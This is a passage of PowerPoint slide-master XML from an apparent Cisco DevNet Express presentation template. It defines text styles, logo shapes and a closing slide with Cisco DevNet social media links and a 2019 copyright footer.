                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="1219170" defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="1828754" defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="2438339" defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Connect with Us and share Your Story…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="897025" y="3462750"/>
            <a:ext cx="3351389" cy="1151980"/>
            <a:chOff x="1196034" y="4810961"/>
            <a:chExt cx="4468518" cy="1535973"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Text Placeholder 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAAAC206-9A88-3D48-959A-E87754796B68}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1528602" y="4810961"/>
              <a:ext cx="4135950" cy="1418214"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lst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2862" indent="0">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="450"/>
                </a:spcBef>
                <a:buFont typeface="Arial" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>CiscoDevNet</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="42862" indent="0">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="450"/>
                </a:spcBef>
                <a:buFont typeface="Arial" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>#</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>DevNetExpress</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="42862" indent="0">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="450"/>
                </a:spcBef>
                <a:buFont typeface="Arial" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>facebook.com</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ciscodevnet</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>/ </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="42862" indent="0">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="450"/>
                </a:spcBef>
                <a:buFont typeface="Arial" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>http://github.com/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>CiscoDevNet</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="0D3A5C"/>
                  </a:solidFill>
                  <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                  <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95779378-9FE7-1E41-B181-1DD9A65E538F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr userDrawn="1"/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"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229910" y="5242933"/>
              <a:ext cx="298692" cy="298692"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{182696BE-37C8-7D49-9753-E9C01221B127}"/>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96034" y="5981159"/>
              <a:ext cx="349467" cy="365775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28E69E19-8E61-3A49-9770-F85A9B2CF43B}"/>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266486" y="5668092"/>
              <a:ext cx="233068" cy="233068"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="Picture 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95779378-9FE7-1E41-B181-1DD9A65E538F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr userDrawn="1"/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"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251645" y="4882337"/>
              <a:ext cx="298692" cy="298692"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18066415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5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11FA1C9D-BAAC-7540-AA74-B04ED364A132}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>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a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2821054" y="1060327"/>
            <a:ext cx="3501892" cy="2534777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7635713-6CF6-4743-9F0B-3B95D9CD4448}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1316422" y="3671464"/>
            <a:ext cx="6885218" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CiscoDevNet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DevNetExpress</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D3A5C"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18256240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1_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dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2682E39F-58A8-3847-BD18-46182BBB5B2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="67000"/>
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId3"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8409541" y="4665276"/>
            <a:ext cx="591540" cy="304018"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18895912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26026535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34B1C16-5163-4B41-BEEC-B89370F8557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286"/>
            <a:ext cx="9144000" cy="5140930"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="216009848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defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT Light" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17"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849925" y="4946906"/>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29"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 2019  Cisco and/or its affiliates. All rights reserved.   Cisco Public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B810A9CF-C747-2B40-A1E3-3B19743F3386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4314558" y="4909950"/>
            <a:ext cx="514886" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="b">
            <a:spAutoFit/>
          </a:bodyP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#CLUS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8370151" y="4880893"/>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
        <p:nvSpPr>
          <p:cNvPr id="33" name="Freeform 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1CF8571-1D0E-4150-86CE-170EBEE47846}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="536418" y="4785455"/>
            <a:ext cx="822960" cy="276700"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 3628 w 4066"/>
              <a:gd name="T1" fmla="*/ 826 h 1365"/>
              <a:gd name="T2" fmla="*/ 3718 w 4066"/>
              <a:gd name="T3" fmla="*/ 964 h 1365"/>
              <a:gd name="T4" fmla="*/ 3811 w 4066"/>
              <a:gd name="T5" fmla="*/ 668 h 1365"/>
              <a:gd name="T6" fmla="*/ 4065 w 4066"/>
              <a:gd name="T7" fmla="*/ 98 h 1365"/>
              <a:gd name="T8" fmla="*/ 4000 w 4066"/>
              <a:gd name="T9" fmla="*/ 17 h 1365"/>
              <a:gd name="T10" fmla="*/ 3679 w 4066"/>
              <a:gd name="T11" fmla="*/ 626 h 1365"/>
              <a:gd name="T12" fmla="*/ 3554 w 4066"/>
              <a:gd name="T13" fmla="*/ 1359 h 1365"/>
              <a:gd name="T14" fmla="*/ 3659 w 4066"/>
              <a:gd name="T15" fmla="*/ 1062 h 1365"/>
              <a:gd name="T16" fmla="*/ 3507 w 4066"/>
              <a:gd name="T17" fmla="*/ 1308 h 1365"/>
              <a:gd name="T18" fmla="*/ 1989 w 4066"/>
              <a:gd name="T19" fmla="*/ 1161 h 1365"/>
              <a:gd name="T20" fmla="*/ 2169 w 4066"/>
              <a:gd name="T21" fmla="*/ 203 h 1365"/>
              <a:gd name="T22" fmla="*/ 2189 w 4066"/>
              <a:gd name="T23" fmla="*/ 155 h 1365"/>
              <a:gd name="T24" fmla="*/ 2169 w 4066"/>
              <a:gd name="T25" fmla="*/ 747 h 1365"/>
              <a:gd name="T26" fmla="*/ 2183 w 4066"/>
              <a:gd name="T27" fmla="*/ 1359 h 1365"/>
              <a:gd name="T28" fmla="*/ 2465 w 4066"/>
              <a:gd name="T29" fmla="*/ 550 h 1365"/>
              <a:gd name="T30" fmla="*/ 2491 w 4066"/>
              <a:gd name="T31" fmla="*/ 389 h 1365"/>
              <a:gd name="T32" fmla="*/ 2392 w 4066"/>
              <a:gd name="T33" fmla="*/ 1283 h 1365"/>
              <a:gd name="T34" fmla="*/ 2395 w 4066"/>
              <a:gd name="T35" fmla="*/ 989 h 1365"/>
              <a:gd name="T36" fmla="*/ 2361 w 4066"/>
              <a:gd name="T37" fmla="*/ 612 h 1365"/>
              <a:gd name="T38" fmla="*/ 2268 w 4066"/>
              <a:gd name="T39" fmla="*/ 1300 h 1365"/>
              <a:gd name="T40" fmla="*/ 3092 w 4066"/>
              <a:gd name="T41" fmla="*/ 778 h 1365"/>
              <a:gd name="T42" fmla="*/ 3001 w 4066"/>
              <a:gd name="T43" fmla="*/ 907 h 1365"/>
              <a:gd name="T44" fmla="*/ 2784 w 4066"/>
              <a:gd name="T45" fmla="*/ 1356 h 1365"/>
              <a:gd name="T46" fmla="*/ 2654 w 4066"/>
              <a:gd name="T47" fmla="*/ 1311 h 1365"/>
              <a:gd name="T48" fmla="*/ 2553 w 4066"/>
              <a:gd name="T49" fmla="*/ 694 h 1365"/>
              <a:gd name="T50" fmla="*/ 2770 w 4066"/>
              <a:gd name="T51" fmla="*/ 762 h 1365"/>
              <a:gd name="T52" fmla="*/ 2770 w 4066"/>
              <a:gd name="T53" fmla="*/ 818 h 1365"/>
              <a:gd name="T54" fmla="*/ 2778 w 4066"/>
              <a:gd name="T55" fmla="*/ 1088 h 1365"/>
              <a:gd name="T56" fmla="*/ 2815 w 4066"/>
              <a:gd name="T57" fmla="*/ 1094 h 1365"/>
              <a:gd name="T58" fmla="*/ 3151 w 4066"/>
              <a:gd name="T59" fmla="*/ 508 h 1365"/>
              <a:gd name="T60" fmla="*/ 3092 w 4066"/>
              <a:gd name="T61" fmla="*/ 778 h 1365"/>
              <a:gd name="T62" fmla="*/ 3227 w 4066"/>
              <a:gd name="T63" fmla="*/ 739 h 1365"/>
              <a:gd name="T64" fmla="*/ 3165 w 4066"/>
              <a:gd name="T65" fmla="*/ 843 h 1365"/>
              <a:gd name="T66" fmla="*/ 3123 w 4066"/>
              <a:gd name="T67" fmla="*/ 1277 h 1365"/>
              <a:gd name="T68" fmla="*/ 3346 w 4066"/>
              <a:gd name="T69" fmla="*/ 1291 h 1365"/>
              <a:gd name="T70" fmla="*/ 3439 w 4066"/>
              <a:gd name="T71" fmla="*/ 1108 h 1365"/>
              <a:gd name="T72" fmla="*/ 3213 w 4066"/>
              <a:gd name="T73" fmla="*/ 1271 h 1365"/>
              <a:gd name="T74" fmla="*/ 3405 w 4066"/>
              <a:gd name="T75" fmla="*/ 876 h 1365"/>
              <a:gd name="T76" fmla="*/ 3566 w 4066"/>
              <a:gd name="T77" fmla="*/ 685 h 1365"/>
              <a:gd name="T78" fmla="*/ 3478 w 4066"/>
              <a:gd name="T79" fmla="*/ 708 h 1365"/>
              <a:gd name="T80" fmla="*/ 3380 w 4066"/>
              <a:gd name="T81" fmla="*/ 843 h 1365"/>
              <a:gd name="T82" fmla="*/ 3478 w 4066"/>
              <a:gd name="T83" fmla="*/ 708 h 1365"/>
              <a:gd name="T84" fmla="*/ 116 w 4066"/>
              <a:gd name="T85" fmla="*/ 1088 h 1365"/>
              <a:gd name="T86" fmla="*/ 480 w 4066"/>
              <a:gd name="T87" fmla="*/ 1003 h 1365"/>
              <a:gd name="T88" fmla="*/ 257 w 4066"/>
              <a:gd name="T89" fmla="*/ 1359 h 1365"/>
              <a:gd name="T90" fmla="*/ 646 w 4066"/>
              <a:gd name="T91" fmla="*/ 826 h 1365"/>
              <a:gd name="T92" fmla="*/ 649 w 4066"/>
              <a:gd name="T93" fmla="*/ 919 h 1365"/>
              <a:gd name="T94" fmla="*/ 646 w 4066"/>
              <a:gd name="T95" fmla="*/ 969 h 1365"/>
              <a:gd name="T96" fmla="*/ 649 w 4066"/>
              <a:gd name="T97" fmla="*/ 1345 h 1365"/>
              <a:gd name="T98" fmla="*/ 703 w 4066"/>
              <a:gd name="T99" fmla="*/ 1068 h 1365"/>
              <a:gd name="T100" fmla="*/ 937 w 4066"/>
              <a:gd name="T101" fmla="*/ 1240 h 1365"/>
              <a:gd name="T102" fmla="*/ 691 w 4066"/>
              <a:gd name="T103" fmla="*/ 1221 h 1365"/>
              <a:gd name="T104" fmla="*/ 923 w 4066"/>
              <a:gd name="T105" fmla="*/ 1116 h 1365"/>
              <a:gd name="T106" fmla="*/ 863 w 4066"/>
              <a:gd name="T107" fmla="*/ 1029 h 1365"/>
              <a:gd name="T108" fmla="*/ 863 w 4066"/>
              <a:gd name="T109" fmla="*/ 961 h 1365"/>
              <a:gd name="T110" fmla="*/ 1278 w 4066"/>
              <a:gd name="T111" fmla="*/ 1280 h 1365"/>
              <a:gd name="T112" fmla="*/ 1354 w 4066"/>
              <a:gd name="T113" fmla="*/ 1099 h 1365"/>
              <a:gd name="T114" fmla="*/ 1078 w 4066"/>
              <a:gd name="T115" fmla="*/ 1156 h 1365"/>
